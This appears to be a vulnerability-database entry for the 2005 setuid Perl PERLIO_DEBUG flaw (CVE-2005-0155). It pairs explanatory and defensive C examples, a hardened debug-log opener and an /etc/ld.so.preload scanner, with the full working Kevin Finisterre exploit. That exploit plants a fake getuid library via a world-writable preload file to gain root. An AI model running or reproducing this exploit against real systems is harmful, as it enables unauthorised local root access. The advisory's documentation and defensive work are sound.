Perl SuidPerl Buffer Overflow Vulnerability

Vulnerability ID: 1108441
Published: 2005-02-07    Updated: 2005-10-20
CVE ID: CVE-2005-0155
CNNVD ID: CNNVD-200505-522
Platform: Linux    CVSS score: 4.6
| Source
https://www.exploit-db.com/exploits/792
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-522
| Details
sperl (suidperl), the setuid-root helper shipped with Perl, honours the PERLIO_DEBUG environment variable and opens the file it names for its PerlIO debug output while still running with root privileges, before it has validated its arguments. A local attacker can therefore create or overwrite arbitrary files as root, with the attacker's own umask deciding the resulting permissions; the exploit below uses this to plant a world-writable /etc/ld.so.preload. The advisories also describe the same variable as a vector for a buffer overflow.
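The root cause is a privileged program trusting an environment variable for a file path. The C snippet below is an added illustration, not code from Perl's source tree or from the advisory: it shows the unsafe shape next to a hardened one that ignores the variable whenever the real and effective ids differ (the direction the upstream fix took: Perl's PerlIO_debug consults PERLIO_DEBUG only when uid == euid, gid == egid and taint mode is off) and opens the file with O_NOFOLLOW and a restrictive mode. Function names and the example paths are hypothetical.

```c
/* Added example (not from the advisory or from Perl): the pattern that
 * made suidperl's PERLIO_DEBUG dangerous, beside a hardened version.
 * Function names are hypothetical. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Vulnerable shape: trust the environment regardless of privilege.
 * Run setuid-root with PERLIO_DEBUG=/etc/ld.so.preload and a permissive
 * umask, the file is created owned by root with mode 0666 & ~umask,
 * which is exactly what the exploit on this page relies on.
 * Returns the descriptor, or -1 when the variable is unset. */
int open_debug_log_unsafe(const char *env_path)
{
        if (env_path == NULL || *env_path == '\0')
                return -1;
        return open(env_path, O_WRONLY | O_APPEND | O_CREAT, 0666);
}

/* The decision a setuid program must make before touching the
 * environment: 1 if the debug path may be honoured, 0 if it must be
 * ignored. Takes the ids as parameters so the policy can be tested
 * without actually running privileged. */
int debug_log_allowed(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid,
                      const char *env_path)
{
        if (env_path == NULL || *env_path == '\0')
                return 0;
        if (ruid != euid || rgid != egid)   /* setuid/setgid: the caller chose the path, not us */
                return 0;
        if (env_path[0] != '/')             /* refuse paths resolved relative to an unknown cwd */
                return 0;
        return 1;
}

/* Hardened shape: only honour the variable when unprivileged, never
 * follow a symlink at the final component, and create with 0600
 * instead of leaving the mode to the caller's umask. Because the open
 * happens with the caller's own privileges, it cannot create anything
 * the caller could not already create. */
int open_debug_log_safe(const char *env_path)
{
        if (!debug_log_allowed(getuid(), geteuid(), getgid(), getegid(), env_path))
                return -1;
        return open(env_path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
}

int main(void)
{
        const char *p = getenv("PERLIO_DEBUG");   /* same variable sperl read */
        int fd = open_debug_log_safe(p);
        if (fd < 0) {
                fprintf(stderr, "debug log disabled (unset, relative, or running setuid)\n");
                return 0;
        }
        const char msg[] = "debug output goes here\n";
        write(fd, msg, sizeof msg - 1);
        close(fd);
        return 0;
}
```

Run it twice to see the policy in action: once as an ordinary user with `PERLIO_DEBUG=/tmp/perlio.log ./a.out`, which appends to the log, and once as a setuid-root copy with the same variable, which prints the "disabled" message and touches nothing.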
| Exploit
/*
 * Copyright Kevin Finisterre 
 * 
 * ** DISCLAIMER ** I am in no way responsible for your stupidity.
 * ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
 *
 * ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
 * ** WARNING ** overwriting /etc/ld.so.preload can severely fuck up your box (or someone else's).
 * ** WARNING ** have a boot disk ready in case something goes wrong.
 *
 * Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
 *
 * this exploits a vulnerability in the PERLIO_DEBUG functionality
 * tested against sperl5.8.4 on Debian
 *
 * kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
 * kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
 * ls: /etc/ld.so.preload: No such file or directory
 * kfinisterre@jdam:~$ ./ex_perl
 * sperl needs fd script
 * You should not call sperl directly; do you need to change a #! line
 * from sperl to perl?
 * kfinisterre@jdam:~$ su -
 * jdam:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * jdam:~# rm /etc/ld.so.preload
 *
 */


#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <stdlib.h>     /* exit(), system(), putenv() */
#include <sys/stat.h>   /* umask() */

int main(void)
{
        FILE *getuid;
        FILE *ld_so_preload;

        /* Stage 1: build a tiny shared object whose getuid() always
         * reports uid 0. Once it is preloaded into every process, su
         * believes it is already root and does not ask for a password. */
        if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        fprintf(getuid, "int getuid(){return 0;}\n" );
        fclose(getuid);

        system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");

        /* Stage 2: point sperl's PerlIO debug output at /etc/ld.so.preload.
         * sperl opens that path for writing while still root, before it
         * complains about the missing script, so the file is created
         * owned by root. */
        putenv("PERLIO_DEBUG="PRELOAD);
        /* umask(001) leaves 0666 & ~001 = rw-rw-rw-, so the root-owned
         * file stays writable by this unprivileged user afterwards. */
        umask(001); // I'm rw-rw-rw james bitch!
        system("/usr/bin/sperl5.8.4");

        /* Stage 3: the file now exists and is world-writable; replace
         * whatever sperl logged with the path of the bogus getuid(). */
        char preload[] = {
                "/tmp/getuid.so\n"
        };

        if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
        fclose(ld_so_preload);
        return 0;
}

// milw0rm.com [2005-02-07]
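A responder checking a host for this exploit's artefact wants two things: whether /etc/ld.so.preload exists with permissions an unprivileged user could have obtained, and whether any entry in it points outside the system library directories. The checker below is an added example, not part of the advisory or of the exploit; the trusted and user-writable prefix lists are assumptions to adjust per distribution, and treating `#` lines as comments is this scanner's choice rather than something glibc promises.

```c
/* Added example (not from the advisory): scan /etc/ld.so.preload for
 * entries that point at attacker-controllable locations, and report
 * whether the file itself is writable by group or others. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Prefixes ordinary users can normally write under (assumption): a
 * preloaded library living here is attacker-controlled by definition. */
static const char *const user_writable_prefixes[] = {
        "/tmp/", "/var/tmp/", "/dev/shm/", "/home/", NULL
};
/* Where a legitimately preloaded library would live (assumption;
 * extend for your distribution). */
static const char *const trusted_prefixes[] = {
        "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/", NULL
};

static int has_prefix(const char *s, const char *const *prefixes)
{
        for (; *prefixes; prefixes++)
                if (strncmp(s, *prefixes, strlen(*prefixes)) == 0)
                        return 1;
        return 0;
}

/* 1 if a single preload entry deserves a closer look. */
int preload_entry_suspicious(const char *entry)
{
        if (entry[0] != '/')                 /* relative: resolved through the library search path */
                return 1;
        if (strstr(entry, "/../") != NULL)   /* traversal out of a trusted prefix */
                return 1;
        if (has_prefix(entry, user_writable_prefixes))
                return 1;
        return !has_prefix(entry, trusted_prefixes);
}

/* Walk the whitespace-separated entries of a preload file's text and
 * return how many are suspicious. Lines starting with '#' are skipped
 * as comments (this scanner's assumption, not a glibc guarantee). */
int scan_preload_text(const char *text)
{
        int suspicious = 0;
        const char *p = text;
        while (*p) {
                while (*p == ' ' || *p == '\t' || *p == '\r' || *p == '\n')
                        p++;
                if (*p == '\0')
                        break;
                if (*p == '#') {
                        while (*p && *p != '\n')
                                p++;
                        continue;
                }
                size_t full = strcspn(p, " \t\r\n");
                size_t n = full;
                char entry[4096];
                if (n >= sizeof entry)
                        n = sizeof entry - 1;   /* truncate absurdly long tokens */
                memcpy(entry, p, n);
                entry[n] = '\0';
                if (preload_entry_suspicious(entry))
                        suspicious++;
                p += full;
        }
        return suspicious;
}

/* 1 if path exists and is writable by group or others: a root-owned
 * but world-writable /etc/ld.so.preload is exactly what the exploit
 * above produces via umask(001). */
int preload_file_writable_by_others(const char *path)
{
        struct stat st;
        if (stat(path, &st) != 0)
                return 0;
        return (st.st_mode & (S_IWGRP | S_IWOTH)) != 0;
}

/* Read the file and scan it; -1 if it is absent (the healthy case). */
int scan_preload_file(const char *path)
{
        char buf[65536];
        FILE *f = fopen(path, "r");
        if (!f)
                return -1;
        size_t n = fread(buf, 1, sizeof buf - 1, f);
        fclose(f);
        buf[n] = '\0';
        return scan_preload_text(buf);
}

int main(void)
{
        const char *path = "/etc/ld.so.preload";
        int bad = scan_preload_file(path);
        if (bad < 0) {
                puts("no /etc/ld.so.preload present");
                return 0;
        }
        printf("%s: %d suspicious entr%s, %s\n", path, bad, bad == 1 ? "y" : "ies",
               preload_file_writable_by_others(path) ? "WRITABLE by group/other" : "mode ok");
        return bad > 0;
}
```

The exit status is non-zero when anything suspicious is found, so the program drops straight into a cron job or a host-audit script. On a box hit by the exploit above it reports one suspicious entry (/tmp/getuid.so) and a world-writable file.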
| References

Source: XF
Name: perl-perliodebug-file-overwrite (19207)
Link: http://xforce.iss.net/xforce/xfdb/19207
Source: TRUSTIX
Name: 2005-0003
Link: http://www.trustix.org/errata/2005/0003/
Source: BID
Name: 12426
Link: http://www.securityfocus.com/bid/12426
Source: REDHAT
Name: RHSA-2005:105
Link: http://www.redhat.com/support/errata/RHSA-2005-105.html
Source: REDHAT
Name: RHSA-2005:103
Link: http://www.redhat.com/support/errata/RHSA-2005-103.html
Source: GENTOO
Name: GLSA-200502-13
Link: http://www.gentoo.org/security/en/glsa/glsa-200502-13.xml
Source: FULLDISC
Name: 20050207 DMA[2005-0131a] - 'Setuid Perl PERLIO_DEBUG root owned file creation'
Link: http://marc.theaimsgroup.com/?l=full-disclosure&m=110779723332339&w=2
Source: BUGTRAQ
Name: 20050202 [USN-72-1] Perl vulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110737149402683&w=2
Source: MISC
Name: http://www.digitalmunition.com/DMA[2005-0131a].txt
Link: http://www.digitalmunition.com/DMA%5B2005-0131a%5D.txt
Source: MANDRAKE
Name: MDKSA-2005:031
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2005:031
Source: support.avaya.com
Link: http:
